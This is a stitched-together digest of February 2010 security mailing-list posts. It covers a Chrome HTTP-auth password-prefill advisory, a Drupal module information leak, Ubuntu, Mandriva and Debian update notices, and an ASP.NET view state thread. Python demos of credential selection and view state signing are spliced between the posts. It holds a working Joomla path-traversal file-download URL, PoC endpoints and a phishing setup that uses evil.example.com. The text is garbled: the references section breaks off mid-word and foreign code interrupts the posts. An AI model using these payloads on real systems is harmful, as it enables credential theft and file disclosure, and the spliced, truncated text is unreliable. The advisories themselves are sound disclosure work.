-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
"Google Chrome is a web browser that runs web pages and applications with
 lightning speed." [1]


Vulnerability Overview
----------------------
In mid-January, VSR identified a vulnerability in Google Chrome which could be
used in phishing attacks in specific types of web sites.  This issue may make it
much easier to convince a victim to submit web application credentials to the
attacker's site.


Vulnerability Details
---------------------
As with many modern browsers, Google Chrome implements a password manager to
help users keep track of credentials used on various web sites.  It may be used
to store either HTTP authentication credentials or form-based credentials.

The vulnerability surfaces in a situation where a user visits a web page which
includes an embedded object, such as an image, from a third-party site.  If an
attacker had control of the third-party web server, he could request credentials
from the user via HTTP authentication.  This style of attack has been documented
in the past, and some variations on this theme are explored in a recent paper
by VSR [5].

However, in the case of vulnerable versions of Google Chrome, the password
manager may pre-fill the authentication dialog box with credentials intended for
the parent page's domain, leaving users one click away from account compromise.
This issue would affect Chrome users who use applications that allow users to
embed objects from third parties.  Examples of such applications may include
message boards, blogs, or social networking sites.

The following steps may be used to reproduce the issue:

1. Set up an HTML page with the following contents:

     <img src="http://evil.example.com/image.png" />

   This page should not be protected by any authentication and should be hosted
   at:
     http://victim.example.org/test-img.html


2. Set up an HTTP digest protected area under the following URL:
   http://victim.example.org/private/


3. Set up the attacker's server to be protected by HTTP authentication such that
   the following URL is protected: 
   http://evil.example.com/image.png


4. Use Google Chrome to log in to an area protected with HTTP authentication,
   such as:
   http://victim.example.org/private

   Save the password in the password manager.


5. Finally, access the unauthenticated HTML page on the victim's server:
   http://victim.example.org/test-img.html
 
   Since the embedded image requires authentication, a password prompt should
   appear.  In vulnerable versions of Google Chrome, this form will be
   pre-filled with the stored credentials from the victim.example.org domain,
   even though the password prompt is generated by evil.example.com.



Versions Affected
-----------------
The issue was originally discovered in version 3.0.195.38 and was also verified
to exist in version 4.0.249.78.  Testing was conducted on the Windows platform.


Vendor Response
---------------
The following timeline details Google's response to the reported issue:

2010-01-20  VSR submitted a security bug report [3].  Chromium development
            team began researching the issue.

2010-01-21  VSR provided additional details on the test scenario.  Chromium
            developers successfully reproduced the issue and committed a fix
            to the source repository [4].

2010-02-10  Chrome stable version 4.0.249.89 released which includes the fix.

2010-02-15  VSR advisory released.



Recommendation
--------------
Upgrade to the latest version of Google Chrome as soon as possible.

Users are advised to be wary of HTTP authentication prompts and to carefully
inspect the domains presented in these messages to see if they match the domain
of the expected site.



Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-0556 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
----------------
Thanks to the Chromium development team for the prompt response.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. htt
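As an added illustration, not VSR's or Chromium's code, the credential-selection decision the advisory describes, modelled in Python: the weak selector offers whatever is stored for the parent page's origin, the corrected one keys on the origin and realm of the server that actually sent the 401, and a notice helper produces the domain comparison the Recommendation section asks users to make. The store, hosts and realms are constructed from the advisory's example names.

```python
from dataclasses import dataclass
from typing import Iterable, Optional
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Credential:
    """A saved HTTP-auth login, keyed by the challenging server's origin."""
    origin: str    # scheme://host[:port] of the server that sent the 401
    realm: str     # WWW-Authenticate realm the login was saved for
    username: str
    password: str


@dataclass(frozen=True)
class AuthChallenge:
    """A 401 received for resource_url while page_url is the top-level document."""
    page_url: str
    resource_url: str
    realm: str


def origin_of(url: str) -> str:
    """Reduce a URL to scheme://host[:port], dropping the scheme's default port."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"not an http(s) URL: {url!r}")
    default = 80 if parts.scheme == "http" else 443
    port = parts.port or default
    if port == default:
        return f"{parts.scheme}://{parts.hostname}"
    return f"{parts.scheme}://{parts.hostname}:{port}"


def weak_prefill(store: Iterable[Credential], ch: AuthChallenge) -> Optional[Credential]:
    """Vulnerable behaviour as described in the advisory: the prompt is filled
    with whatever is stored for the parent page's origin, no matter which
    server issued the challenge."""
    page_origin = origin_of(ch.page_url)
    for cred in store:
        if cred.origin == page_origin:
            return cred
    return None


def safe_prefill(store: Iterable[Credential], ch: AuthChallenge) -> Optional[Credential]:
    """Corrected behaviour: only a login saved for the challenging server's
    origin and realm is offered, so a third-party image server never sees
    what was stored for the page that embeds it."""
    challenger = origin_of(ch.resource_url)
    for cred in store:
        if cred.origin == challenger and cred.realm == ch.realm:
            return cred
    return None


def cross_origin_notice(ch: AuthChallenge) -> Optional[str]:
    """Text a prompt should carry so the user can compare domains, as the
    advisory recommends; None when page and challenger share an origin."""
    page, challenger = origin_of(ch.page_url), origin_of(ch.resource_url)
    if page == challenger:
        return None
    return f"{challenger} is asking for a password while you are viewing {page}"


# Constructed data following the advisory's reproduction steps 2 to 5.
STORE = [Credential("http://victim.example.org", "private", "alice", "placeholder")]
EMBEDDED_IMAGE = AuthChallenge(
    page_url="http://victim.example.org/test-img.html",
    resource_url="http://evil.example.com/image.png",
    realm="evil",
)
SAME_SITE = AuthChallenge(
    page_url="http://victim.example.org/test-img.html",
    resource_url="http://victim.example.org/private/",
    realm="private",
)

if __name__ == "__main__":
    print("weak selector offers:", weak_prefill(STORE, EMBEDDED_IMAGE))
    print("safe selector offers:", safe_prefill(STORE, EMBEDDED_IMAGE))
    print("prompt notice:", cross_origin_notice(EMBEDDED_IMAGE))
```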

Information disclosure vulnerability in Drupal's Realname User Reference Widget contributed module (version 6.x-1.0)

2010-02-16 Thread Martin Barbella
Information disclosure vulnerability in Drupal's Realname User Reference
Widget contributed module (version 6.x-1.0)
 
Discovered by Martin Barbella 
 
Description of Vulnerability:
-----------------------------
Drupal is a free software package that allows an individual or a
community of users to easily publish, manage and organize a wide variety
of content on a website (http://drupal.org/about).
 
The Realname CCK User Reference Widget module adds a new widget to the
User Reference CCK field type that uses the Realnames for autocompletion
(http://drupal.org/project/realname_userreference).
 
Only the access content permission is needed to access the page which
displays the user names and real names for users, used by the
autocompletion widget, resulting in an information disclosure
vulnerability.
 
Systems affected:
-----------------
This has been confirmed in version 6.x-1.0 of the Realname User
Reference Widget module.
 
Impact:
-------
This would allow an attacker to collect user names for brute force
attacks, or real names of users for targeted phishing.
 
Mitigating factors:
-------------------
A user must have the access content permission to exploit this
vulnerability, though in most cases even anonymous users would have this
permission.
 
Proof of concept:
-----------------
1. Install the module and its dependencies
2. Configure Realname
3. As any user with access content, visit
realnameuserreference/autocomplete or
realnameuserreference/autocomplete/
4. Note that real names and usernames can be gathered from the output
 
Timeline:
---------
2010-02-01 - Drupal Security notified
2010-02-16 - Still no response from Drupal Security
2010-02-16 - Public disclosure


[USN-900-1] Ruby vulnerabilities

2010-02-16 Thread Marc Deslauriers
===========================================================
Ubuntu Security Notice USN-900-1            February 16, 2010
ruby1.9 vulnerabilities
CVE-2009-1904, CVE-2009-4124, CVE-2009-4492
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  libruby1.9  1.9.0.2-7ubuntu1.3
  ruby1.9 1.9.0.2-7ubuntu1.3

Ubuntu 9.04:
  libruby1.9  1.9.0.2-9ubuntu1.2
  ruby1.9 1.9.0.2-9ubuntu1.2

Ubuntu 9.10:
  libruby1.9  1.9.0.5-1ubuntu1.2
  ruby1.9 1.9.0.5-1ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Emmanouel Kellinis discovered that Ruby did not properly handle certain
string operations. An attacker could exploit this issue and possibly
execute arbitrary code with application privileges. (CVE-2009-4124)

Giovanni Pellerano, Alessandro Tanasi, and Francesco Ongaro discovered that
Ruby did not properly sanitize data written to log files. An attacker could
insert specially-crafted data into log files which could affect certain
terminal emulators and cause arbitrary files to be overwritten, or even
possibly execute arbitrary commands. (CVE-2009-4492)

It was discovered that Ruby did not properly handle string arguments that
represent large numbers. An attacker could exploit this and cause a denial
of service. This issue only affected Ubuntu 9.10. (CVE-2009-1904)


Updated packages for Ubuntu 8.10:


[ MDVSA-2010:037 ] fetchmail

2010-02-16 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2010:037
 http://www.mandriva.com/security/
 ___

 Package : fetchmail
 Date: February 16, 2010
 Affected: 2010.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in fetchmail:
 
 The sdump function in sdump.c in fetchmail 6.3.11, 6.3.12, and 6.3.13,
 when running in verbose mode on platforms for which char is signed,
 allows remote attackers to cause a denial of service (application
 crash) or possibly execute arbitrary code via an SSL X.509 certificate
 containing non-printable characters with the high bit set, which
 triggers a heap-based buffer overflow during escaping (CVE-2010-0562).
 
 This update provides fetchmail 6.3.14, which is not vulnerable to
 this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0562
 http://www.fetchmail.info/fetchmail-SA-2010-01.txt
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Joomla (Jw_allVideos) Remote File Download Vulnerability

2010-02-16 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#
# Vulnerability:
# 
http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###


[SECURITY] [DSA-1997-1] New mysql-dfsg-5.0 packages fix several vulnerabilities

2010-02-16 Thread Giuseppe Iuculano

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1997-1                  secur...@debian.org
http://www.debian.org/security/                        Giuseppe Iuculano
February 14, 2010                    http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package: mysql-dfsg-5.0
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-4019 CVE-2009-4030 CVE-2009-4484

Several vulnerabilities have been discovered in the MySQL
database server.
The Common Vulnerabilities and Exposures project identifies the
following problems:


CVE-2009-4019

Domas Mituzas discovered that mysqld does not properly handle errors during
execution of certain SELECT statements with subqueries, and does not preserve
certain null_value flags during execution of statements that use the
GeomFromWKB function, which allows remote authenticated users to cause a
denial of service (daemon crash) via a crafted statement.


CVE-2009-4030

Sergei Golubchik discovered that MySQL allows local users to bypass certain
privilege checks by calling CREATE TABLE on a MyISAM table with modified
DATA DIRECTORY or INDEX DIRECTORY arguments that are originally associated
with pathnames without symlinks, and that can point to tables created at
a future time at which a pathname is modified to contain a symlink to a
subdirectory of the MySQL data home directory.


CVE-2009-4484

Multiple stack-based buffer overflows in the CertDecoder::GetName function
in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld, allow
remote attackers to execute arbitrary code or cause a denial of service
(memory corruption and daemon crash) by establishing an SSL connection and
sending an X.509 client certificate with a crafted name field.


For the oldstable distribution (etch), these problems have been fixed in
version 5.0.32-7etch12

For the stable distribution (lenny), these problems have been fixed in
version 5.0.51a-24+lenny3

The testing (squeeze) and unstable (sid) distribution do not contain
mysql-dfsg-5 anymore.

We recommend that you upgrade your mysql-dfsg-5.0 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.


RE: Trustwave's SpiderLabs Security Advisory TWSL2010-001

2010-02-16 Thread David Byrne
I respectfully defend our statement as very realistic. The .Net exploit 
provided in the advisory is all that is required to work; no code-behind is 
required because the vulnerability related to "innerhtml" lies in the .Net 
code. 

The specific flaw is actually in 
System.Web.UI.HTMLControls.HtmlContainerControl class, which is the super class 
of the HTMLForm control (among others). The bug is easy to spot in the 
LoadViewState method as revealed in .Net Reflector:


protected override void LoadViewState(object savedState)
{
    if (savedState != null)
    {
        base.LoadViewState(savedState);
        string text = (string) this.ViewState["innerhtml"];
        if (text != null)
        {
            this.Controls.Clear();
            this.Controls.Add(new LiteralControl(text));
        }
    }
}

 
For those not familiar with C#, the .Net class takes the "innerhtml" value from 
the view state and adds it as a LiteralControl (basically literal HTML) in its 
"Controls" collection. When the HtmlContainerControl object is rendered, it 
will take that LiteralControl and place HTML directly into the response body. 

The other .Net-defined subclasses of HtmlContainerControl are listed below:
HtmlAnchor
HtmlButton
HtmlGenericControl
HtmlHead
HtmlSelect
HtmlTable
HtmlTableCell
ListViewTableCell
HtmlTableRow
ListViewTableRow
HtmlTextArea


There are other .Net controls that take properties from the view state that may 
also be vulnerable. Enumerating them is not very helpful because the solution 
will always be the same: secure the view state.

Regarding the articles you linked to, I am familiar with Scott Mitchell's. It 
is a great document, but the vulnerabilities he references have to do with 
custom use of the view state, not specific flaws inherent in the .Net view 
state. As we mentioned in the advisory, technically this is a known issue in 
.Net, although a proof of concept attack against the framework has (to our 
knowledge) not been documented before.

I've also read Michal Zalewski's advisory. It stands out as (I think) the first 
specific attacks documented against .Net's view state. However, they are of a 
different nature than the attack documented in our advisory. 

Sacha Faust's post on encoding controls is a useful reference, but isn't 
directly relevant to view state attacks. The list is of properties that will 
automatically HTML encode when the programmer sets the value. This isn't 
necessarily the same as when the value is set in the view state. 


Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security
Email: dby...@trustwave.com



-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Chris Weber
Sent: Thursday, February 11, 2010 3:43 PM
To: Trustwave Advisories; webapp...@lists.securityfocus.com; 
websecur...@webappsec.org; full-disclos...@lists.grok.org.uk; 
bugtraq@securityfocus.com
Subject: [Full-disclosure] (resend) RE: [WEB SECURITY] Trustwave's SpiderLabs 
Security Advisory TWSL2010-001

The key part of the advisory for me wasn't VIEWSTATE as much as it was the 
controls, but this statement you made seemed pretty outrageous (with regard to 
ASP.NET):

   'These vulnerabilities show that unsigned client-side viewstates will ALWAYS 
result in a vulnerability in the affected products.'

I would disagree - it depends how the software developer implemented use of the 
VIEWSTATE's content.  In ASP.NET, the interesting part here was that you 
appeared to be controlling an innerhtml property of a Form control through the 
VIEWSTATE.  What your example didn't show, I'm assuming, is some code behind 
that pulled out the  and set the value in the form's innerHtml 
property/attribute. That's just dangerous coding, akin to trusting client-side 
input and no different than acting on client input that came from any method, 
form input, JSON, etc.  Your repro was a bit confusing/misleading without that 
part.  Otherwise, were you saying that some controls inherently populate their 
properties/attributes from VIEWSTATE content automagically?  

There have been past discussions on VIEWSTATE's security:

Scott Mitchell documented tampering VIEWSTATE in a 2004 article:
http://msdn.microsoft.com/en-us/library/ms972976.aspx#viewstate_topic12

Michal Zalewski reported some exploit scenarios with replay and DoS through 
VIEWSTATE.
http://seclists.org/bugtraq/2005/May/27

You made a reference to how other controls are also vulnerable to this attack.  
I think that data would be more useful in the advisory.  

Yes there do exist ASP.NET controls which don't properly encode, and I would 
refer readers to Sacha Faust's FxCop rule which finds those dangerous controls:

http://blogs.msdn.com/sfaust/archive/2008/09/18/fxcop-htmlspotter-spotting-asp-net-xss-using-fxcop-and-html-enco
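An added example in Python, not ASP.NET or Trustwave code, of the point the two messages above circle around: a client-side state blob that carries no MAC can be edited in the browser and a LoadViewState-style path will render the edited "innerhtml" as literal markup, while a keyed HMAC check rejects the edit before anything is rendered. The blob format (base64 of JSON plus an HMAC-SHA256 tag) and the key are constructed stand-ins for the real __VIEWSTATE encoding and machine key.

```python
import base64
import hashlib
import hmac
import json

PLACEHOLDER_KEY = b"placeholder-machine-key"   # constructed; never deploy
TAG_LEN = hashlib.sha256().digest_size          # 32 bytes of MAC


def encode_unsigned(state: dict) -> str:
    """Serialise state with no integrity protection (the weak configuration)."""
    return base64.b64encode(json.dumps(state, sort_keys=True).encode()).decode()


def load_unsigned(blob: str) -> dict:
    """Load with no check: whatever the client sends back is believed."""
    return json.loads(base64.b64decode(blob))


def encode_signed(state: dict, key: bytes = PLACEHOLDER_KEY) -> str:
    """Serialise state and append an HMAC over the serialised bytes."""
    payload = json.dumps(state, sort_keys=True).encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + tag).decode()


def load_signed(blob: str, key: bytes = PLACEHOLDER_KEY) -> dict:
    """Load only if the tag verifies; constant-time compare avoids leaking it."""
    raw = base64.b64decode(blob)
    if len(raw) <= TAG_LEN:
        raise ValueError("view state too short to carry a MAC")
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("view state MAC validation failed")
    return json.loads(payload)


def client_edit(blob: str, prop: str, value: str) -> str:
    """A browser-side edit: decode, change one property, re-encode.
    A signed blob keeps its old tag because the client holds no key."""
    raw = base64.b64decode(blob)
    try:
        state, tag = json.loads(raw), b""
    except ValueError:                       # trailing MAC bytes are not JSON
        state, tag = json.loads(raw[:-TAG_LEN]), raw[-TAG_LEN:]
    state[prop] = value
    return base64.b64encode(json.dumps(state, sort_keys=True).encode() + tag).decode()


def render_container(state: dict) -> str:
    """Mirror of the quoted LoadViewState behaviour: the innerhtml property
    is placed into the response body as literal markup."""
    return f"<form>{state.get('innerhtml', '')}</form>"


ORIGINAL = {"innerhtml": "<p>server-generated content</p>", "page": "Default"}
MARKER = "<em>edited on the client</em>"    # constructed, harmless marker


def demo_unsigned() -> str:
    """Unsigned path: the edited markup reaches the response unchanged."""
    tampered = client_edit(encode_unsigned(ORIGINAL), "innerhtml", MARKER)
    return render_container(load_unsigned(tampered))


def demo_signed() -> str:
    """Signed path: the same edit fails MAC validation and nothing renders."""
    tampered = client_edit(encode_signed(ORIGINAL), "innerhtml", MARKER)
    try:
        render_container(load_signed(tampered))
        return "rendered"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    print("unsigned:", demo_unsigned())
    print("signed:  ", demo_signed())
```

In ASP.NET the corresponding switch is the enableViewStateMac attribute of the pages element in web.config, which must stay on.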

[ MDVSA-2010:036 ] webmin

2010-02-16 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2010:036
 http://www.mandriva.com/security/
 ___

 Package : webmin
 Date: February 12, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 This advisory updates webmin to the latest version 1.500, fixing
 several bugs and a cross-site scripting issue which allows remote
 attackers to inject arbitrary web script or HTML via unspecified
 vectors (CVE-2009-4568).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4568
 https://qa.mandriva.com/27789
 https://qa.mandriva.com/57313
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  